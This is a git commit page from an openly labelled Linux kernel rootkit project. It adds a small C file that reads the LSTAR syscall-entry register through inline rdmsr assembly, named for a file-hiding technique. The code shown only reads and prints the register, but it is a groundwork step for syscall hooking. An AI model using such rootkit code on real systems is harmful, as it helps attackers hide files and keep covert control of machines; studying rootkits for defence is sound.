linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit b799331bd6b2a52968cfd6de184f46c4e3f862e7
parent bee0bfad4b1de9ae0033b9128d1e86bde0101d83
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Fri,  1 Jan 2021 21:45:05 +0100

Add lstar reading

Diffstat:

Asrc/filehide_lstar.c | 38++++++++++++++++++++++++++++++++++++++


Asrc/filehide_lstar.h | 2++


2 files changed, 40 insertions(+), 0 deletions(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -0,0 +1,37 @@
+#include <linux/kernel.h>
+
+#include "filehide_lstar.h"
+#include "common.h"
+
+static unsigned long read_lstar(void);
+
+void
+test_lstar(void)
+{
+    unsigned long lstar = read_lstar();
+
+    DEBUG_INFO("LSTAR is %0lx\n", lstar);
+}
+
+static unsigned long 
+read_lstar(void)
+{
+    unsigned int low, high;
+
+    __asm__ volatile (
+                    "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+                    "rdmsr\n\t"
+                    "mov %%eax, %[low]\n\t"
+                    "mov %%edx, %[high]"
+                    : [low] "=r" (low), [high] "=r" (high) 
+                    :
+                    : "ecx", "eax", "edx"
+                );
+
+    //Get two 32bit values into a 64bit variable
+    unsigned long ret = high;
+    ret <<= 32;
+    ret |= low;
+
+    return ret;
+}
+\ No newline at end of file
diff --git a/src/filehide_lstar.h b/src/filehide_lstar.h
@@ -0,0 +1 @@
+void test_lstar(void);
+\ No newline at end of file